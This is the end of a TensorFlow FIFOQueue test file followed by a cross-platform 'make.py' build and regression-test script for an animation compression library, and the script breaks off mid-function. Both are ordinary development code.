# Verify that enqueue() checks that when using names we must enqueue a
# dictionary.
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op = q.enqueue(10.0)
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op = q.enqueue((10.0,))
# The dictionary keys must match the queue component names.
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"x": 12})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"f": 10.0, "s": "aa"})
enqueue_op = q.enqueue({"f": 10.0})
enqueue_op2 = q.enqueue({"f": 20.0})
enqueue_op3 = q.enqueue({"f": 30.0})
# Verify that enqueue_many() checks that when using names we must enqueue
# a dictionary.
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op4 = q.enqueue_many([40.0, 50.0])
# The dictionary keys must match the queue component names.
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({"x": 12})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({"f": [40.0, 50.0], "s": ["aa", "bb"]})
enqueue_op4 = q.enqueue_many({"f": [40.0, 50.0]})
dequeue = q.dequeue()
dequeue_2 = q.dequeue_many(2)
self.evaluate(enqueue_op)
self.evaluate(enqueue_op2)
self.evaluate(enqueue_op3)
self.evaluate(enqueue_op4)
f = sess.run(dequeue["f"])
self.assertEqual(10.0, f)
f = sess.run(dequeue_2["f"])
self.assertEqual([20.0, 30.0], list(f))
f = sess.run(dequeue_2["f"])
self.assertEqual([40.0, 50.0], list(f))
def testEnqueueDequeueMultipleComponent(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32, dtypes_lib.string),
shapes=((), (), ()),
names=("f", "i", "s"))
# Verify that enqueue() checks that when using names we must enqueue a
# dictionary.
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op = q.enqueue((10.0, 123, "aa"))
# The dictionary keys must match the queue component names.
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"x": 10.0})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"i": 12, "s": "aa"})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op = q.enqueue({"i": 123, "s": "aa", "f": 10.0, "x": 10.0})
enqueue_op = q.enqueue({"i": 123, "s": "aa", "f": 10.0})
enqueue_op2 = q.enqueue({"i": 124, "s": "bb", "f": 20.0})
enqueue_op3 = q.enqueue({"i": 125, "s": "cc", "f": 30.0})
# Verify that enqueue_many() checks that when using names we must enqueue
# a dictionary.
with self.assertRaisesRegexp(ValueError, "enqueue a dictionary"):
enqueue_op4 = q.enqueue_many(([40.0, 50.0], [126, 127], ["dd", "ee"]))
# The dictionary keys must match the queue component names.
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({"x": [10.0, 20.0]})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({"i": [12, 12], "s": ["aa", "bb"]})
with self.assertRaisesRegexp(ValueError, "match names of Queue"):
enqueue_op4 = q.enqueue_many({
"f": [40.0, 50.0],
"i": [126, 127],
"s": ["dd", "ee"],
"x": [1, 2]
})
enqueue_op4 = q.enqueue_many({
"f": [40.0, 50.0],
"i": [126, 127],
"s": ["dd", "ee"]
})
dequeue = q.dequeue()
dequeue_2 = q.dequeue_many(2)
self.evaluate(enqueue_op)
self.evaluate(enqueue_op2)
self.evaluate(enqueue_op3)
self.evaluate(enqueue_op4)
i, f, s = sess.run([dequeue["i"], dequeue["f"], dequeue["s"]])
self.assertEqual(123, i)
self.assertEqual(10.0, f)
self.assertEqual(compat.as_bytes("aa"), s)
i, f, s = sess.run([dequeue_2["i"], dequeue_2["f"], dequeue_2["s"]])
self.assertEqual([124, 125], list(i))
self.assertTrue([20.0, 30.0], list(f))
self.assertTrue([compat.as_bytes("bb"), compat.as_bytes("cc")], list(s))
i, f, s = sess.run([dequeue_2["i"], dequeue_2["f"], dequeue_2["s"]])
self.assertEqual([126, 127], list(i))
self.assertTrue([40.0, 50.0], list(f))
self.assertTrue([compat.as_bytes("dd"), compat.as_bytes("ee")], list(s))
class FIFOQueueWithTimeoutTest(test.TestCase):
def testDequeueWithTimeout(self):
with self.session(
config=config_pb2.ConfigProto(operation_timeout_in_ms=20)) as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
self.assertEqual(
compat.as_bytes(""), q.queue_ref.op.get_attr("container"))
dequeued_t = q.dequeue()
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaisesRegexp(errors_impl.DeadlineExceededError,
"Timed out waiting for notification"):
self.evaluate(dequeued_t)
def testReusableAfterTimeout(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
dequeued_t = q.dequeue()
enqueue_op = q.enqueue(37)
with self.assertRaisesRegexp(errors_impl.DeadlineExceededError,
"Timed out waiting for notification"):
sess.run(dequeued_t, options=config_pb2.RunOptions(timeout_in_ms=10))
with self.assertRaisesRegexp(errors_impl.DeadlineExceededError,
"Timed out waiting for notification"):
sess.run(dequeued_t, options=config_pb2.RunOptions(timeout_in_ms=10))
self.evaluate(enqueue_op)
self.assertEqual(37, self.evaluate(dequeued_t))
class QueueContainerTest(test.TestCase):
def testContainer(self):
with ops.Graph().as_default():
with ops.container("test"):
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
self.assertEqual(
compat.as_bytes("test"), q.queue_ref.op.get_attr("container"))
class FIFOQueueBenchmark(test.Benchmark):
"""Benchmark FIFOQueue operations."""
def _build_graph(self):
"""Builds a graph that enqueues and dequeues a single float.
Returns:
A tuple with the graph init tensor and graph output tensor.
"""
q = data_flow_ops.FIFOQueue(1, "float")
init = q.enqueue(1.0)
x = q.dequeue()
q_inc = q.enqueue(x + 1)
return init, q_inc
# TODO(suharshs): Add benchmarks for:
# - different capacities of the queue
# - various sizes of tensors
# - enqueue_many, dequeue_many
def _run(self, num_iters):
"""Benchmarks enqueueing and dequeueing from a FIFOQueue.
Args:
num_iters: The number of iterations to run.
Returns:
The duration of the run in seconds.
"""
graph = ops.Graph()
with graph.as_default():
init, output = self._build_graph()
with session_lib.Session(graph=graph) as session:
init.run()
_ = session.run(output) # warm up.
start_time = time.time()
for _ in range(num_iters):
_ = session.run(output)
duration = time.time() - start_time
print("%f secs per enqueue-dequeue" % (duration / num_iters))
self.report_benchmark(
name="fifo_queue", iters=num_iters, wall_time=duration / num_iters)
return duration
if __name__ == "__main__":
test.main()
|
make.py | # coding: utf-8
from __future__ import print_function
import argparse
import multiprocessing
import os
import platform
import re
import shutil
import subprocess
import sys
import threading
import time
import zipfile
# The current test/decompression data version in use
current_test_data = 'test_data_v5'
current_decomp_data = 'decomp_data_v7'
def parse_argv():
parser = argparse.ArgumentParser(add_help=False)
actions = parser.add_argument_group(title='Actions', description='If no action is specified, on Windows, OS X, and Linux the solution/make files are generated. Multiple actions can be used simultaneously.')
actions.add_argument('-build', action='store_true')
actions.add_argument('-clean', action='store_true')
actions.add_argument('-clean_only', action='store_true')
actions.add_argument('-unit_test', action='store_true')
actions.add_argument('-regression_test', action='store_true')
actions.add_argument('-bench', action='store_true')
actions.add_argument('-run_bench', action='store_true')
actions.add_argument('-pull_bench', action='store_true') # Android only
actions.add_argument('-convert', help='Input/Output directory to convert')
target = parser.add_argument_group(title='Target')
target.add_argument('-compiler', choices=['vs2015', 'vs2017', 'vs2019', 'vs2019-clang', 'android', 'clang4', 'clang5', 'clang6', 'clang7', 'clang8', 'clang9', 'clang10', 'clang11', 'gcc5', 'gcc6', 'gcc7', 'gcc8', 'gcc9', 'gcc10', 'osx', 'ios', 'emscripten'], help='Defaults to the host system\'s default compiler')
target.add_argument('-config', choices=['Debug', 'Release'], type=str.capitalize)
target.add_argument('-cpu', choices=['x86', 'x64', 'armv7', 'arm64', 'wasm'], help='Defaults to the host system\'s architecture')
misc = parser.add_argument_group(title='Miscellaneous')
misc.add_argument('-avx', dest='use_avx', action='store_true', help='Compile using AVX instructions on Windows, OS X, and Linux')
misc.add_argument('-pop', dest='use_popcnt', action='store_true', help='Compile using the POPCNT instruction')
misc.add_argument('-nosimd', dest='use_simd', action='store_false', help='Compile without SIMD instructions')
misc.add_argument('-nosjson', dest='use_sjson', action='store_false', help='Compile without SJSON support')
misc.add_argument('-num_threads', help='No. to use while compiling and regressing')
misc.add_argument('-tests_matching', help='Only run tests whose names match this regex')
misc.add_argument('-help', action='help', help='Display this usage information')
num_threads = multiprocessing.cpu_count()
if platform.system() == 'Linux' and sys.version_info >= (3, 4):
num_threads = len(os.sched_getaffinity(0))
if not num_threads or num_threads == 0:
num_threads = 4
parser.set_defaults(build=False, clean=False, clean_only=False, unit_test=False, regression_test=False, bench=False, run_bench=False, pull_bench=False,
compiler=None, config='Release', cpu=None, use_avx=False, use_popcnt=False, use_simd=True, use_sjson=True,
num_threads=num_threads, tests_matching='')
args = parser.parse_args()
# Sanitize and validate our options
if args.use_avx and not args.use_simd:
print('SIMD is disabled; AVX cannot be used')
args.use_avx = False
if args.compiler == 'android':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Windows':
print('Android is only supported on Windows')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on Android')
sys.exit(1)
if not args.cpu in ['armv7', 'arm64']:
print('{} cpu architecture not in supported list [armv7, arm64] for Android'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'ios':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Darwin':
print('iOS is only supported on OS X')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on iOS')
sys.exit(1)
if args.unit_test:
print('Unit tests cannot run from the command line on iOS')
sys.exit(1)
if not args.cpu in ['arm64']:
print('{} cpu architecture not in supported list [arm64] for iOS'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'emscripten':
if not args.cpu:
args.cpu = 'wasm'
if not platform.system() == 'Darwin' and not platform.system() == 'Linux':
print('Emscripten is only supported on OS X and Linux')
sys.exit(1)
if args.use_avx:
print('AVX is not supported with Emscripten')
sys.exit(1)
if not args.cpu in ['wasm']:
print('{} cpu architecture not in supported list [wasm] for Emscripten'.format(args.cpu))
sys.exit(1)
else:
if not args.cpu:
args.cpu = 'x64'
if args.cpu == 'arm64':
if not args.compiler in ['vs2017', 'vs2019', 'ios', 'android']:
print('arm64 is only supported with VS2017, VS2019, Android, and iOS')
sys.exit(1)
elif args.cpu == 'armv7':
if not args.compiler == 'android':
print('armv7 is only supported with Android')
sys.exit(1)
elif args.cpu == 'wasm':
if not args.compiler == 'emscripten':
print('wasm is only supported with Emscripten')
sys.exit(1)
if platform.system() == 'Darwin' and args.cpu == 'x86':
result = subprocess.check_output(['xcodebuild', '-version']).decode("utf-8")
if 'Xcode 11' in result:
print('Versions of Xcode 11 and up no longer support x86')
sys.exit(1)
return args
def get_generator(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2015':
if cpu == 'x86':
return 'Visual Studio 14'
elif cpu == 'x64':
return 'Visual Studio 14 Win64'
elif compiler == 'vs2017':
if cpu == 'x86':
return 'Visual Studio 15'
elif cpu == 'x64':
return 'Visual Studio 15 Win64'
elif cpu == 'arm64':
# VS2017 ARM/ARM64 support only works with cmake 3.13 and up and the architecture must be specified with
# the -A cmake switch
return 'Visual Studio 15 2017'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
return 'Visual Studio 16 2019'
elif compiler == 'android':
# For Android, we use the default generator since we don't build with CMake
return None
elif platform.system() == 'Darwin':
if compiler == 'osx' or compiler == 'ios':
return 'Xcode'
elif compiler == 'emscripten':
# Emscripten uses the default generator
return None
elif platform.system() == 'Linux':
if compiler == 'emscripten':
# Emscripten uses the default generator
return None
return 'Unix Makefiles'
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def get_architecture(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2017':
if cpu == 'arm64':
return 'ARM64'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
if cpu == 'x86':
return 'Win32'
else:
return cpu
# This compiler/cpu pair does not need the architecture switch
return None
def get_toolchain(compiler, cmake_script_dir):
if platform.system() == 'Windows' and compiler == 'android':
return os.path.join(cmake_script_dir, 'Toolchain-Android.cmake')
elif platform.system() == 'Darwin' and compiler == 'ios':
return os.path.join(cmake_script_dir, 'Toolchain-iOS.cmake')
# No toolchain
return None
def set_compiler_env(compiler, args):
if platform.system() == 'Linux':
os.environ['MAKEFLAGS'] = '-j{}'.format(args.num_threads)
if compiler == 'clang4':
os.environ['CC'] = 'clang-4.0'
os.environ['CXX'] = 'clang++-4.0'
elif compiler == 'clang5':
os.environ['CC'] = 'clang-5.0'
os.environ['CXX'] = 'clang++-5.0'
elif compiler == 'clang6':
os.environ['CC'] = 'clang-6.0'
os.environ['CXX'] = 'clang++-6.0'
elif compiler == 'clang7':
os.environ['CC'] = 'clang-7'
os.environ['CXX'] = 'clang++-7'
elif compiler == 'clang8':
os.environ['CC'] = 'clang-8'
os.environ['CXX'] = 'clang++-8'
elif compiler == 'clang9':
os.environ['CC'] = 'clang-9'
os.environ['CXX'] = 'clang++-9'
elif compiler == 'clang10':
os.environ['CC'] = 'clang-10'
os.environ['CXX'] = 'clang++-10'
elif compiler == 'clang11':
os.environ['CC'] = 'clang-11'
os.environ['CXX'] = 'clang++-11'
elif compiler == 'gcc5':
os.environ['CC'] = 'gcc-5'
os.environ['CXX'] = 'g++-5'
elif compiler == 'gcc6':
os.environ['CC'] = 'gcc-6'
os.environ['CXX'] = 'g++-6'
elif compiler == 'gcc7':
os.environ['CC'] = 'gcc-7'
os.environ['CXX'] = 'g++-7'
elif compiler == 'gcc8':
os.environ['CC'] = 'gcc-8'
os.environ['CXX'] = 'g++-8'
elif compiler == 'gcc9':
os.environ['CC'] = 'gcc-9'
os.environ['CXX'] = 'g++-9'
elif compiler == 'gcc10':
os.environ['CC'] = 'gcc-10'
os.environ['CXX'] = 'g++-10'
elif compiler == 'emscripten':
# Nothing to do for Emscripten
return
else:
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def do_generate_solution(build_dir, cmake_script_dir, test_data_dir, decomp_data_dir, args):
compiler = args.compiler
cpu = args.cpu
config = args.config
if compiler:
set_compiler_env(compiler, args)
extra_switches = ['--no-warn-unused-cli']
extra_switches.append('-DCPU_INSTRUCTION_SET:STRING={}'.format(cpu))
if args.use_avx:
print('Enabling AVX usage')
extra_switches.append('-DUSE_AVX_INSTRUCTIONS:BOOL=true')
if args.use_popcnt:
print('Enabling POPCOUNT usage')
extra_switches.append('-DUSE_POPCNT_INSTRUCTIONS:BOOL=true')
if not args.use_simd:
print('Disabling SIMD instruction usage')
extra_switches.append('-DUSE_SIMD_INSTRUCTIONS:BOOL=false')
if not args.use_sjson:
print('Disabling SJSON support')
extra_switches.append('-DUSE_SJSON:BOOL=false')
if args.bench:
extra_switches.append('-DBUILD_BENCHMARK_EXE:BOOL=true')
if not platform.system() == 'Windows':
extra_switches.append('-DCMAKE_BUILD_TYPE={}'.format(config.upper()))
toolchain = get_toolchain(compiler, cmake_script_dir)
if toolchain:
extra_switches.append('-DCMAKE_TOOLCHAIN_FILE={}'.format(toolchain))
if test_data_dir:
extra_switches.append('-DTEST_DATA_DIR:STRING="{}"'.format(test_data_dir))
if decomp_data_dir:
extra_switches.append('-DDECOMP_DATA_DIR:STRING="{}"'.format(decomp_data_dir))
# Generate IDE solution
print('Generating build files ...')
if compiler == 'emscripten':
cmake_cmd = 'emcmake cmake .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(build_dir, ' '.join(extra_switches))
else:
cmake_generator = get_generator(compiler, cpu)
if not cmake_generator:
print('Using default generator')
else:
generator_suffix = ''
if compiler == 'vs2019-clang':
extra_switches.append('-T ClangCL')
generator_suffix = 'Clang CL'
print('Using generator: {} {}'.format(cmake_generator, generator_suffix))
extra_switches.append('-G "{}"'.format(cmake_generator))
cmake_arch = get_architecture(compiler, cpu)
if cmake_arch:
print('Using architecture: {}'.format(cmake_arch))
extra_switches.append('-A {}'.format(cmake_arch))
cmake_cmd = 'cmake .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(build_dir, ' '.join(extra_switches))
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_build(args):
config = args.config
print('Building ...')
cmake_cmd = 'cmake --build .'
if platform.system() == 'Windows':
if args.compiler == 'android':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target INSTALL'.format(config)
elif platform.system() == 'Darwin':
if args.compiler == 'ios':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target install'.format(config)
else:
cmake_cmd += ' --target install'
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_convert(test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run conversion')
sys.exit(1)
if not os.path.exists(args.convert):
print('Input/Output conversion directory not found: {}'.format(args.convert))
sys.exit(1)
# Validate that our regression testing tool is present
if args.compiler == 'emscripten':
compressor_exe_path = './bin/acl_compressor.js'
elif platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
conversion_clips = []
for (dirpath, dirnames, filenames) in os.walk(args.convert):
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
clip_filename = os.path.join(dirpath, filename)
conversion_clips.append(clip_filename)
# Grab the raw config
config_dir = os.path.join(test_data_dir, 'configs')
config_filename = os.path.join(config_dir, 'uniformly_sampled_raw.config.sjson')
print('Converting SJSON clips in {} ...'.format(args.convert))
conversion_failed = False
for clip_filename in conversion_clips:
output_filename = clip_filename.replace('.acl.sjson', '.acl')
if args.compiler == 'emscripten':
cmd = 'node "{}" -acl="{}" -config="{}" -out="{}"'.format(compressor_exe_path, clip_filename, config_filename, output_filename)
else:
cmd = '"{}" -acl="{}" -config="{}" -out="{}"'.format(compressor_exe_path, clip_filename, config_filename, output_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
result = subprocess.call(cmd, shell=True)
if result != 0:
print('Failed to run conversion for clip: {}'.format(clip_filename))
print(cmd)
conversion_failed = True
print('Done!')
if conversion_failed:
sys.exit(1)
def do_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tests', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.unit_tests/com.acl.unit_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_tests_cmake(args):
ctest_cmd = 'ctest --output-on-failure --parallel {}'.format(args.num_threads)
if platform.system() == 'Windows' or platform.system() == 'Darwin':
ctest_cmd += ' -C {}'.format(args.config)
if args.tests_matching:
ctest_cmd += ' --tests-regex {}'.format(args.tests_matching)
result = subprocess.call(ctest_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_tests(build_dir, args):
print('Running unit tests ...')
if args.compiler == 'android':
do_tests_android(build_dir, args)
else:
do_tests_cmake(args)
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
# We need to clear any previous line we might have to ensure we have no visual artifacts
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
def do_prepare_regression_test_data(test_data_dir, args):
print('Preparing regression test data ...')
current_test_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_test_data))
# Validate that our regression test data is present
if not os.path.exists(current_test_data_zip):
print('Regression test data not found: {}'.format(current_test_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
needs_decompression = not os.path.exists(current_test_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_test_data_zip))
with zipfile.ZipFile(current_test_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
regression_clips = []
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
if len(regression_clips) == 0:
print('No regression clips found')
sys.exit(1)
print('Found {} regression clips'.format(len(regression_clips)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
if len(test_configs) == 0:
print('No regression configurations found')
sys.exit(1)
print('Found {} regression configurations'.format(len(test_configs)))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Write our metadata file
with open(os.path.join(current_test_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('configs = [', file = metadata_file)
for config_filename, _ in test_configs:
print('\t"{}"'.format(os.path.relpath(config_filename, test_config_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename, _ in regression_clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_test_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_test_data_dir
def do_prepare_decompression_test_data(test_data_dir, args):
print('Preparing decompression test data ...')
current_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_decomp_data))
# Validate that our regression test data is present
if not os.path.exists(current_data_zip):
print('Decompression test data not found: {}'.format(current_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
needs_decompression = not os.path.exists(current_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_data_zip))
with zipfile.ZipFile(current_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
clips = []
for (dirpath, dirnames, filenames) in os.walk(current_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
clips.append(clip_filename)
if len(clips) == 0:
print('No decompression clips found')
return
print('Found {} decompression clips'.format(len(clips)))
# Write our metadata file
with open(os.path.join(current_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('clip_dir = "{}"'.format(current_data_dir), file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename in clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_data_dir
def do_regression_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'regression_tester_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.regression_tests/com.acl.regression_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_regression_tests_cmake(test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run regression tests')
sys.exit(1)
import queue
# Validate that our regression testing tool is present
if args.compiler == 'emscripten':
compressor_exe_path = './bin/acl_compressor.js'
elif platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
regression_clips = []
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Iterate over every clip and configuration and perform the regression testing
for config_filename, _ in test_configs:
print('Performing regression tests for configuration: {}'.format(os.path.basename(config_filename)))
regression_start_time = time.perf_counter()
cmd_queue = queue.Queue()
completed_queue = queue.Queue()
failed_queue = queue.Queue()
failure_lock = threading.Lock()
for clip_filename, _ in regression_clips:
if args.compiler == 'emscripten':
cmd = 'node "{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
else:
cmd = '"{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((clip_filename, cmd))
# Add a marker to terminate the threads
for i in range(args.num_threads):
cmd_queue.put(None)
def run_clip_regression_test(cmd_queue, completed_queue, failed_queue, failure_lock):
while True:
entry = cmd_queue.get()
if entry is None:
return
(clip_filename, cmd) = entry
result = subprocess.call(cmd, shell=True)
if result != 0:
failed_queue.put((clip_filename, cmd))
failure_lock.acquire()
print('Failed to run regression test for clip: {}'.format(clip_filename))
print(cmd)
failure_lock.release()
completed_queue.put(clip_filename)
threads = [ threading.Thread(target = run_clip_regression_test, args = (cmd_queue, completed_queue, failed_queue, failure_lock)) for _i in range(args.num_threads) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(regression_clips), 'Testing clips:', '{} / {}'.format(0, len(regression_clips)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = completed_queue.qsize()
print_progress(num_processed, len(regression_clips), 'Testing clips:', '{} / {}'.format(num_processed, len(regression_clips)))
all_threads_done = True
for thread in threads:
if thread.is_alive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
regression_testing_failed = not failed_queue.empty()
regression_end_time = time.perf_counter()
print('Done in {}'.format(format_elapsed_time(regression_end_time - regression_start_time)))
if regression_testing_failed:
sys.exit(1)
def do_regression_tests(build_dir, test_data_dir, args):
print('Running regression tests ...')
if args.compiler == 'android':
do_regression_tests_android(build_dir, args)
else:
do_regression_tests_cmake(test_data_dir, args)
def do_run_bench_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'acl_decompressor', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
